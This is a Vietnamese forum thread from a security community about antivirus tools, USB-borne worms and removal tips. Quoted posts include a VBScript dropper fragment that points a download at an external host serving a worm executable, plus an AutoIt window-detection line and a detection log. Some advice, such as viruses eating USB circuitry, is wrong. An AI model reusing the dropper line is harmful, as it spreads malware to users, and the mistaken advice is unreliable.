Messages posted by: Bí Danh NJ

Bạn dùng Hijack mà quyét ! Con này mình dính rồi ! Quyét sạch mà !

Long_Tecole wrote:

Xin chào các bạn, mình là thành viên mới vào, nhưng cũng có 1 chút kinh nghiệm về USB, xin đựoc góp ý: trong trường hợp của bạn, mình đồng ý là máy tính của bạn không hề có virut, mà dù nếu có, chúng cũng không bao giờ chui vào USB, bởi vì USB là 1 vật trung chuyển, trong khi virut thì có nhu cầu xâm nhập vào Computer để phá hệ thống, ổ cứng....mình cho rằng, trong trường hợp này, USB của bạn vì đã truy cập vào khá nhiều trang wed có virut ẩn náu, nên bi nhiễm khá nặng, thành ra có thể vi mạch điện tử trong đó bi ăn mất khá nhiều, cách tốt nhất là nên ghost lại từ máy tính, vì mình có nghe thầy giáo mình nói phong phanh: " có thể dùng đĩa ghost đã được cài đặt sẵn để đi ghost các máy tính khác, đỡ tốn thời gian, tương tự, cũng có thể áp dụng cho USB ". Mong là có thể thành công..thân!..^_^[b]

mà dù nếu có, chúng cũng không bao giờ chui vào USB, bởi vì USB là 1 vật trung chuyển

Coi bộ cái này khó hiểu đây !

USB của bạn vì đã truy cập vào khá nhiều trang wed có virut ẩn náu, nên bi nhiễm khá nặng, thành ra có thể vi mạch điện tử trong đó bi ăn mất khá nhiều

Ặc ! Cái này bó tay !

cách tốt nhất là nên ghost lại từ máy tính, vì mình có nghe thầy giáo mình nói phong phanh: " có thể dùng đĩa ghost đã được cài đặt sẵn để đi ghost các máy tính khác, đỡ tốn thời gian, tương tự, cũng có thể áp dụng cho USB ". Mong là có thể thành công..thân!

Cái này thì quả thật hết thuốc ! USB mà Ghost lại thì còn ra cái gì nữa ! Ặc ặc !

Coi bộ lỗi này khó khăn đấy ! Giống con Virus Login - Log Off - Cài lại Windows là giải pháp tốt nhất !

ngockhuepham
Post 26/02/2008 11:08:06 Tiêu đề: Re: Cho em hỏi về NOD32
Ủa máy mình xài NOD32 và KIS 7.0.125 có xung đột gì đâu
Bạn muốn KIS không xung đột với những ANTI VIRUS khác theo kinh nghiệm của mình thì bạn nên cài KIS vào trước hết rồi disable hết mấy cái protected đi rồi cài mất ANTI VIRUS kia vào là ok.Mình thì để NOD32 ở chế độ auto.Còn KIS thì mình tắt đi.Không cho statup lên.Khi nào mình nghi ngờ website nào hay file nào thì mình bật nó lên cập nhật và enable proteted lên.Làm xong mình lại tắt nó đi.Đâu cần phải để cả 2 ở chế độ protected đâu.

Rõ khổ - Sao phải khổ thế không biết smilie

!

Có 2 hướng :
Một là lúc bạn Undeep virus mạng theo vào !
Hai là có một số cơ chế xuyên thủng được cái Deep đó (cái này tôi bị rồi)
Tóm lại nếu bạn ngồi cài lại từng máy trong dàn máy đó thì rất mất thời gian - quyét virus trên một máy bằng cách cài trên máy chủ một Anti hiệu quả như Symantec Endpoint Protection 10.Update Data.Khởi động lại máy chủ.Gỡ từng ổ cứng các máy lại gắn vào máy chủ mà quyét (nhớ rút Jum ra hoặc để chế độ Jum 2 [S] để máy tự động nhận dạng ổ cứng của bạn mang đến quyét là ổ khách).Hoặc dùng Ghost !

Ra tiệm mua đĩa CD Symantec Endpoint Protection 10 về cài thử xem - Còn chết liền ! Nhớ Update rồi khởi động lại (không cần thiết phải Safe Mode) mà diệt !

Cũng không phải - Có một số USB có một cái nút Lock và Unlock - Bạn xem có gạt ở chế độ Lock ko ? Nếu có gạt lại Unlock rồi tiến hành định dạng lại đĩa ! Nếu không được hoặc không có nút bạn nên dùng các chương trình ANTI hiệu quả mà quyét ! Trường hợp ko đc nữa bạn vui lòng mang USB ra tiệm và nhớ cầm theo 150 Ngàn đến 250 Ngàn mua cái USB khac mà xài !

Bị cái dây cáp màn hình mà ! Thay dây đi - Thay cả cái cục màn hình đi là khỏe nhất - Rinh cái LCD về - Hết Virus !

subcripstion là cái gì vậy ? subcripstion <- Hiểu được từ này chết liền à smilie

Dùng thằng Fire Lion của bác Hoàng cũng tốt đấy !
http://www.fire-lion.com/

Giống thằng BIT và thằng NOD thôi.Giờ toàn test key online ! Chán !

Máy bạn cấu hình như thế nào (post lên đây)? Bạn bấm Run gõ Msconfig xem mục Startup có những file gì chạy lúc windows khởi động lên và post lên đây thì mới có thể kê toa được chứ smilie

!

Bồ chịu khó Seach trong Box nhé smilie

/hvaonline/posts/list/9530.html

em đang cần gấp tài liệu về nguyên lý hoạt động của các dòng virut phá hủy hệ thống và cách phòng tránh. ai có send cho em với: liveforonelove_7887@yahoo.com em cảm ơn nhiều

vuatrom_21:cần gấp tài liệu về nguyên lý hoạt động của các dòng virut phá hủy hệ thống
Phá hủy hệ thống là sao ? Chẳng hiểu nói kiểu gì ! Phá kiểu gì ? Và để làm gì ?

Remove nó đi là mất lỗi ngay ấy mà ! Máy mạnh thì kiếm Symantec mà xài bạn ạ ! Có thể Seach đâu đó là ra ngay các bản Full mà !

Thử Symantec Endpoint Protection xem ! Hay dùng cả FireLion của bác Hoàng ấy ! Xem thử có hay hơn BKAV không ! Rồi còn con nào nhảy vào nữa không smilie

Bắt đầu có loại worm nhận dạng tên cửa sổ mà thực thi lệnh giống con Gái Xinh rồi smilie

$title = WinGetTitle("Yahoo! Messenger with Voice") - Y chang cái lệnh này - Cứ vào website bkav.com.vn nó thoát ra ngay tức khắc - Nguồn từ con Quang Nhật Lân đây mà smilie

Scan type: Auto-Protect Scan
Event: Risk Found!
Security risk detected: W32.Pitin
File: D:\Documents and Settings\NinJa InTeR\My Documents\Downloads\Programs\nhatquanglan.exe
Location: D:\Documents and Settings\NinJa InTeR\My Documents\Downloads\Programs
Computer: INI-PC
User: NinJa InTeR
Action taken: Pending Side Effects Analysis : Access denied
Date found: Saturday, January 19, 2008 7:28:31 PM

-------------------------------------------------------
Bạn có thể vào mục Phần Mềm của HVA mà tìm tải các chương trình Anti nổi tiếng (tùy thuộc vào cấu hình máy mà cài các phần mềm anti khác nhau) về - update - safe mode quyét là ok !

Sao giống như hồi xưa mình lỡ tay cài Windows.Genuine hết hạn nên nó bắt ra vào thế nhỉ ? hihi smilie

<script language="VBScript">
on error resume next
dl = "http://chuafilene.googlepages.com/nhatquanglan.exe" ; <~~<< ko phải là virus ( doi tên thanh nhatquanglan.txt sẽ đọc được source)

Nếu nó không phải Virus bạn cứ RUN nó lên thử smilie

Anh em chú ý cẩn thận đoạn code và nguồn tải sâu trên.Liệu đây có phải là một mục đích khoe mẽ của người viết nó chăng ?

http://www.bkav.com.vn/thong_tin_virus/16/01/2008/3/1367/
nmcosrv.exe -> Sâu W32.Almanahe.C smilie

Không lạ mới lạ !

Máy cấu hình mạnh không bạn ? Mạnh thì kiếm mấy chương trình Anti nổi tiếng mà cài - Update liên tục - Đừng xài Anti Made In BKAV.COM.VN

Chỉ có thể nói 1 câu nó đc viết bằng AutoIt V3 smilie

Đang test !

Mình muốn tìm hiểu xem thử con này hoạt động ra sao và cơ chế đánh lừa người bị nhiễm như thế nào smilie

Rất mong các cao thủ chỉ giáo cho mình.

Máy mình tự nhiên xuất hiện một Folder mang tên rất lạ - Không có nội dung nào trong này mà mang tên Boot - Trong mục chủ Boot có các nhánh mục con như : cs-CZ ; da-DK ; de-DE ; el-GR ; en-US giống như là một phần của một chương trình nào đó chứa dữ liệu về phần Ngôn Ngữ vậy.Nó cũng chẳng có gì đáng nói nếu như mình ko xóa được mục này.Mình đã tìm mọi cách mà vẫn vô vọng kể cả Boot bằng Hiren's Boot 9.3 và xóa bằng Dos.
Các bác chỉ giúp cách xóa cái Folder này với ! Bó tay thật sự - Scan bằng tất cả các chương trình Anti đều không phát hiện ra cái gì cả.Folder thì trống không.Nhưng ko xóa được smilie

Mình chỉ nói cảm nghĩ vậy thôi.Đối với một số thì vẫn rất Good Idea ! Mình cũng cảm thấy hay nhưng nếu làm theo thì mình nhác lắm.Sẵn Tools nhanh hơn.Đó là cảm giác của mình smilie

Mỗi người một kiểu mà smilie

Đúng không ?

Thông thường các thư mục bị nhiễm con này thường bị ẩn đi.Trừ khi có ai đó tự diệt bằng cách Format luôn cả ổ cứng di động đó thì dữ liệu mới mất hẳn.
Mà cách tốt nhất vẫn nên 1 máy - 1 anti cho nó an toàn.Tùy theo từng cấu hình mà chọn Anti cho phù hợp.
Trong trường hợp khách hàng của bạn.Mình nghĩ là ai đó (có thể là người được nhờ diệt giùm) đã ra tay xóa tất cả theo phương châm : CHO NÓ CHẮC ĂN.Hihi

Có một số không nên và một số là nên. smilie

Trừ khi cái không nên lại xem là nên và ngược lại.Sao lại phải thủ công làm tay thế nhỉ.Chỉ cần một vài tools nhỏ là có thể giải quyết mọi việc xong xuôi smilie

lại đỡ tốn thời gian.Theo mình chỉ cần 1 cái USB có chứa sẵn tools hoặc 1 cd room là xong xuôi.

Con này của một trang WEB Trung Quốc mà mình đã từng bị phải.Dùng Anti Virus không ăn thua đâu.Tốt nhất là dùng Anti Spy mà quyét.

Nhớ Update rồi Sade Mode mà Quyét

Đãm bảo 100% hết !

Nguyên nhân chính của bạn là nằm ở dòng này: C:\WINDOWS\system32\wscntfy.exe
Bạn có thể dùng Task kill để tắt cái này đi, rồi vào msconfig để bỏ hết các dấu tích liên quan đến service của con virus.
Đây cũng là 1 trong số những loại virus lây lan qua chức năng autorun của thiết bị lưu trữ với file autorun.inf.
Vì thế bạn vào đây tham khảo để giải quyết nhé!
/hvaonline/posts/list/16419.html

Hơn nữa, việc bạn cài lại máy virus vẫn tồn tại, muốn biết tại sao, và muốn phải làm gì, thì cũng vào link đó đọc TUT của LKL nhé!!!
/hvaonline/posts/list/16419.html

LKL vào đây nhé :
http://www.google.com.vn/search?hl=vi&q=wscntfy.exe+&meta=

"wscntfy.exe" is the Windows Security Center, introduced in Service Pack 2. It displays a tray icon indicating the status of updates, virus protection, ...

Bạn tìm con NOD 32 Anti Virus mà cài rồi Update diệt.Cách unhidden bạn có thể dùng nhiều chương trình để fix các lỗi đó.

Cài lại win cũng ko hết đâu bạn ah!!! Thật đấy!!!
Thậm chí diệt xong virus rồi, bãn cũng ko xi nhê gì với giữ liệu của mình ấy chứ!!!

Cách đơn giản nhất là trong TUT mình đã nói!

Thế bạn đọc kỹ TUT này cũng trong TUT virus đó của LKL chưa???
Diệt Virus lây lan qua USB và các Virus mạo danh tên, biểu tượng thư mục, file Word, Exel...!!! Rồi làm ẩn đi thư mục, files mà không sao làm hiện lên được!!!

Nói như thế thì làm sao mà diệt hết đc bác LKL nhỉ smilie

Không lẽ bác bó tay sao ? Em ko cần cài lại vẫn xong hết à smilie